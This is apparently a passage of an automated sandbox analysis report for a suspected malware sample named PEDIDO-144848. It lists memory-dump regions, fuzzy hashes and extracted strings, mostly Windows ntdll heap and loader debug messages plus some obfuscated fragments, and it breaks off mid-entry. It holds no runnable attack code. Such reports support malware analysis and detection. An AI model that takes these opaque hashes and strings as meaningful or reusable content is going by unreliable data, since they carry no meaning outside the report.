                                                        • Instruction ID: 6e2dc3a07112aa77f0ba54ec18cd5d850b97370f6a9cb97cad6ff8791a294eea
                                                        • Opcode Fuzzy Hash: 8986cb56edbd6683af66e961d947c69c64c729251e44eae22da26fd1489574be
                                                        • Instruction Fuzzy Hash: 3490022130201812D502615949146060009D7D1349F92C417E3414519EC6358957B137
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 690005c13d17f82ffd4b2edd0f579f5ce96e65ae2d135fa2fbb50eb30a4eb971
                                                        • Instruction ID: e2611a6f38e7b9725d9c3e34c7a16905570b24ed7f860e5fdf2f4afd2ca3bec0
                                                        • Opcode Fuzzy Hash: 690005c13d17f82ffd4b2edd0f579f5ce96e65ae2d135fa2fbb50eb30a4eb971
                                                        • Instruction Fuzzy Hash: CC90023160601C12D55071594914746000597D0305F52C417A2014618EC7658A5976B6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc1d118368f899068b6d9ab5b14bc8bd8ec2ee90731bcd15950d156fb845f017
                                                        • Instruction ID: 733cee3b58b781f990393c921a19c2c5fc40c246fcc82d20b0ea025dd87c0a27
                                                        • Opcode Fuzzy Hash: dc1d118368f899068b6d9ab5b14bc8bd8ec2ee90731bcd15950d156fb845f017
                                                        • Instruction Fuzzy Hash: 3E90026120301413450571594914616400A97E0205B52C427E3004554EC5358895713A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a2f22535cf85539bccf7ab0fd4eea1d972153b96ff9a8f7cabe15e7ba5de8f0
                                                        • Instruction ID: 05642d5223f25e3e2f72a3610b91ef689d0d1be446588c130602ff36adc34569
                                                        • Opcode Fuzzy Hash: 7a2f22535cf85539bccf7ab0fd4eea1d972153b96ff9a8f7cabe15e7ba5de8f0
                                                        • Instruction Fuzzy Hash: 5A90023120201C12D50461594D04686000597D0305F52C417A7014619FD67588957136
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5720125b6da247d54214b89eb9f8e1031c94574cf0f36e882097e2f0dbae8285
                                                        • Instruction ID: ec491d62c8b830cb23ee526cce6c4afc0917ed3188a7cb66e6df2fe9ec5b65db
                                                        • Opcode Fuzzy Hash: 5720125b6da247d54214b89eb9f8e1031c94574cf0f36e882097e2f0dbae8285
                                                        • Instruction Fuzzy Hash: 8B900225222014120545A5590B0450B0445A7D6355392C41BF3406554DC63188696336
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7257146cb9adb123fa9597f108282523870687d267ea02f6b84d687b45d93516
                                                        • Instruction ID: 5eedde8be4f5904a0f0b6c10a4be266d909efa717e5b2cc8a9a971436fd72f18
                                                        • Opcode Fuzzy Hash: 7257146cb9adb123fa9597f108282523870687d267ea02f6b84d687b45d93516
                                                        • Instruction Fuzzy Hash: 4790022160601812D54071595918706001597D0205F52D417A2014518EC6698A5976B6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce999882f70a222fd51d6aab4098f53acda8e045d2b28b9fd3275d16abf6d125
                                                        • Instruction ID: 647596578ee2dcea4c36f7e3abb22ff5e836075ff4c6c405eeec9b68f0f2df30
                                                        • Opcode Fuzzy Hash: ce999882f70a222fd51d6aab4098f53acda8e045d2b28b9fd3275d16abf6d125
                                                        • Instruction Fuzzy Hash: AF90023120201C52D50061594904B46000597E0305F52C41BA2114618EC625C8557536
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3558027158
                                                        • Opcode ID: 407fa056566595c576a4764f57daec6c5a4f689614f0c688bf976a87ac242bb0
                                                        • Instruction ID: efa4e7a0a7df891d15aaaf67b3c0fce60956dacad2e09318ceab9ee98ac07fe5
                                                        • Opcode Fuzzy Hash: 407fa056566595c576a4764f57daec6c5a4f689614f0c688bf976a87ac242bb0
                                                        • Instruction Fuzzy Hash: C0914DF04082988AC7158F54A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;%5$";&#$#;$<$#;%;$'!"$$5Rpv$5Tee$5[A5$: &"$;&#5$;'5F$=B|{$=^]A$V}gz$XY95$Xzo|$qzbf$tstg$w^|a$xp:!$ypBp$yyt:$y|~p$|: &$~z<5
                                                        • API String ID: 0-2921030433
                                                        • Opcode ID: 334c17b577a8355afea16a9f35ad22556fd274177893f46976d8191483d2c60d
                                                        • Instruction ID: 8e3c17f41e19f76dd3f511e0802f350bc3037f44d4fc9b50eb4727ec9e9901bc
                                                        • Opcode Fuzzy Hash: 334c17b577a8355afea16a9f35ad22556fd274177893f46976d8191483d2c60d
                                                        • Instruction Fuzzy Hash: 772153B040474DDFCB04CF84E981AEE7B74FF05354F91925DE8096F258C6B2829ACB85

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: HEAP:
                                                        • API String ID: 3446177414-2466845122
                                                        • Opcode ID: 4765b0d1d7236a051600c80a71969a0a0f03e7c40c1fb5fad40e23491eead239
                                                        • Instruction ID: 6ba906cad1a4a750d0160de28a031f408a45ff0fc85d9443b92b9c134722e2a9
                                                        • Opcode Fuzzy Hash: 4765b0d1d7236a051600c80a71969a0a0f03e7c40c1fb5fad40e23491eead239
                                                        • Instruction Fuzzy Hash: 4BA19B75A147128FE704CF69C894A1AB7E6FF88354F14492EEA45DB310EBB0EC46CB91
                                                        Strings
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 36C74592
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36C74507
                                                        • Execute=1, xrefs: 36C7451E
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36C74460
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36C74530
                                                        • ExecuteOptions, xrefs: 36C744AB
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36C7454D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 598f2d2c557b240cc7446bd3f2ef9368756db16123c1a73d6cd9e910fcebad44
                                                        • Instruction ID: bbc0e923abe57e8ce5d2cec9912766ad56a719ae3e74f22d04927fc538748a51
                                                        • Opcode Fuzzy Hash: 598f2d2c557b240cc7446bd3f2ef9368756db16123c1a73d6cd9e910fcebad44
                                                        • Instruction Fuzzy Hash: 15513571A01619AEEB119AA5EC99FE977B8EF08344F2004ADE505E7280EB34DA41CF75
                                                        Strings
                                                        • Actx , xrefs: 36C67819, 36C67880
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C677E2
                                                        • SsHd, xrefs: 36C1A304
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 36C677DD, 36C67802
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C67807
                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36C678F3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                        • API String ID: 0-1988757188
                                                        • Opcode ID: 10ba136904518adff716e0646d8405ebc49f3a62d956d0ccaaf1add1fcd41f4d
                                                        • Instruction ID: 2bd7350b2a1451a6432fc1417538d6ff39ed54101e1842f8155d3d7b191abd72
                                                        • Opcode Fuzzy Hash: 10ba136904518adff716e0646d8405ebc49f3a62d956d0ccaaf1add1fcd41f4d
                                                        • Instruction Fuzzy Hash: 69E10574A087028FE705CFA6C88471A77E1FF88368F544A2DF855CB290DBB1D885DB92
                                                        APIs
                                                        Strings
                                                        • Actx , xrefs: 36C69315
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C69153
                                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36C69372
                                                        • GsHd, xrefs: 36C1D794
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 36C6914E, 36C69173
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C69178
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                        • API String ID: 3446177414-2196497285
                                                        • Opcode ID: 6ab8c57c3a8ee14905f46e08054f06409bb6ddd6c56ec0df258aa115bfed1874
                                                        • Instruction ID: 8a49afc2db49cc70f379d34cec93a2a4b833a51e0cfc861ed9301bb6a522ca72
                                                        • Opcode Fuzzy Hash: 6ab8c57c3a8ee14905f46e08054f06409bb6ddd6c56ec0df258aa115bfed1874
                                                        • Instruction Fuzzy Hash: 84E1B0B4A083429FE710CF16C8D0B4AF7E4BF88358F544A6EE995CB281D771E945CB92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                        • API String ID: 3446177414-4227709934
                                                        • Opcode ID: 2ed20d9499c0f599f8995d47749c8edc42795d45935d44950212df214e13d6fd
                                                        • Instruction ID: a1328c057df7291ad80ca9bc843fabfd5b51b187a5863e714cbd55de662d20dc
                                                        • Opcode Fuzzy Hash: 2ed20d9499c0f599f8995d47749c8edc42795d45935d44950212df214e13d6fd
                                                        • Instruction Fuzzy Hash: 7B414AB9E00209AFDB01DF99C980ADEBFB9FF48354F214169E924A7340D771EA01CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                        • API String ID: 3446177414-3492000579
                                                        • Opcode ID: 4c656f2e6bd3fc9419f030907f1bc8e58ef3f420d4673d04328632dc55133f0e
                                                        • Instruction ID: b5a7c633b2605153bdd03a2c297fedc0ffbc6a5a4105a6041bd5a7e64ccf6ba8
                                                        • Opcode Fuzzy Hash: 4c656f2e6bd3fc9419f030907f1bc8e58ef3f420d4673d04328632dc55133f0e
                                                        • Instruction Fuzzy Hash: F871FD31914786DFDB01CFA9D890AADFBF2FF48304F04815AE494AB262CB369945CF91
                                                        APIs
                                                        Strings
                                                        • LdrpLoadShimEngine, xrefs: 36C5984A, 36C5988B
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C59854, 36C59895
                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36C59885
                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36C59843
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-3589223738
                                                        • Opcode ID: 7e87153fb7a4793bc03981088bc899372011dd62b44ededc994b07d42fb605ac
                                                        • Instruction ID: 70a5a9063f2f1a3c772861784e1d4683fef66376ee3c428fe065b38c2f9500de
                                                        • Opcode Fuzzy Hash: 7e87153fb7a4793bc03981088bc899372011dd62b44ededc994b07d42fb605ac
                                                        • Instruction Fuzzy Hash: AF513735A20398AFDB04DBA9CC54EDDBBB6EB44304F05016AEA40FF296DB719C55CB81
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                        • API String ID: 3446177414-3224558752
                                                        • Opcode ID: 5badefd4316b9726c876ec30880d96dcf6ea54958ea5a2ac0437a541a6ed4187
                                                        • Instruction ID: 1723f8c7c943395e43e4b99d542c47d737961d779ae28e2580b0e2b3b7753663
                                                        • Opcode Fuzzy Hash: 5badefd4316b9726c876ec30880d96dcf6ea54958ea5a2ac0437a541a6ed4187
                                                        • Instruction Fuzzy Hash: 4E417835A14740DFEB01CF26C994BA9B7B5FF00368F1484ADE8259B781CB78E984CB95
                                                        APIs
                                                        Strings
                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 36CAEDE3
                                                        • HEAP: , xrefs: 36CAECDD
                                                        • Entry Heap Size , xrefs: 36CAEDED
                                                        • ---------------------------------------, xrefs: 36CAEDF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                        • API String ID: 3446177414-1102453626
                                                        • Opcode ID: 291547939b1c6c89955d73b061f0174c13c4e9dc62c0286f05e406fc91bff44e
                                                        • Instruction ID: 4710d883c8c392b18f4a0e91a88989b5feb0569859fd3980d196cfc5b7d794e1
                                                        • Opcode Fuzzy Hash: 291547939b1c6c89955d73b061f0174c13c4e9dc62c0286f05e406fc91bff44e
                                                        • Instruction Fuzzy Hash: 8A414939E10256DFC704CF19C884999BBB6EB89354B25C06ED504EF222D732EC42DBE0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                        • API String ID: 3446177414-1222099010
                                                        • Opcode ID: bcdde4c54c3493970093d8241c01c809bda99ad99f4554123c498fa6e52cdb24
                                                        • Instruction ID: 89c40b6c0580533ea42cda906b3adcb64db88de6d894c214f4a01eb0c5143edf
                                                        • Opcode Fuzzy Hash: bcdde4c54c3493970093d8241c01c809bda99ad99f4554123c498fa6e52cdb24
                                                        • Instruction Fuzzy Hash: 63316935514BC4DFEB12CF25C86CF8977A5EF00758F048499E8118B6A1CB69E944CF56
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$@
                                                        • API String ID: 3446177414-1194432280
                                                        • Opcode ID: 1e572c7134464542ef998a55e3dcb5daa69598a4b973af28a24c29f442311e44
                                                        • Instruction ID: 383e3d603758f716bdcd6f18c8b9534bf4e9ca1d7390184905915cf39307e46d
                                                        • Opcode Fuzzy Hash: 1e572c7134464542ef998a55e3dcb5daa69598a4b973af28a24c29f442311e44
                                                        • Instruction Fuzzy Hash: 67815DB1D002699BDB21CF55CC44BEEB7B8AF08714F0041EAE909B7280D7749E85CFA5
                                                        APIs
                                                        Strings
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 36C73466
                                                        • LdrpFindDllActivationContext, xrefs: 36C73440, 36C7346C
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 36C7344A, 36C73476
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36C73439
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-3779518884
                                                        • Opcode ID: 4a68de64a22ec8596ca3f82549833234ccb523baa149ad2082b94bf7a160e778
                                                        • Instruction ID: 29f63d36e505b0e0e9753b9421b3bc21a41303331616e9a0ba8fb2621ff3f341
                                                        • Opcode Fuzzy Hash: 4a68de64a22ec8596ca3f82549833234ccb523baa149ad2082b94bf7a160e778
                                                        • Instruction Fuzzy Hash: 1E31F6B6E06351AFFB11BB06A844AD5BAA4FF01394F72C16ED504AB150D768DC88CBF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HYDH$LPU_$UQ][$U_]H$]HUS$]JUZ$]LLP
                                                        • API String ID: 0-1800400536
                                                        • Opcode ID: 64279eaad89b32bd996c2e165d779f1ddae72a478ecf51e9cce80b56bab29252
                                                        • Instruction ID: d92304a6394e71b7b6292a94b770ba36b7ddd90b0ce09e792a42239168f681a4
                                                        • Opcode Fuzzy Hash: 64279eaad89b32bd996c2e165d779f1ddae72a478ecf51e9cce80b56bab29252
                                                        • Instruction Fuzzy Hash: D541D7B0914348DFEB01DF14D040BDEBBB0FB09718F91462DE85AAB241DB768259CB86
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 3446177414-3610490719
                                                        • Opcode ID: 8e6b0c4a9be6bcdecc6ac97b3334a9a952694908ae0e118db4d005a6b5e3a1e0
                                                        • Instruction ID: 4850a4f2dca8b8a3795ee2ffd715276a4d8a22f313a393d2d8e358905fc7452b
                                                        • Opcode Fuzzy Hash: 8e6b0c4a9be6bcdecc6ac97b3334a9a952694908ae0e118db4d005a6b5e3a1e0
                                                        • Instruction Fuzzy Hash: 09911371A24B60ABE305DF25CC40B1AB7A9EF48644F104559EA409F2A2DF35E849CF96
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C69F2E
                                                        • Failed to allocated memory for shimmed module list, xrefs: 36C69F1C
                                                        • LdrpCheckModule, xrefs: 36C69F24
                                                        Memory Dump Source
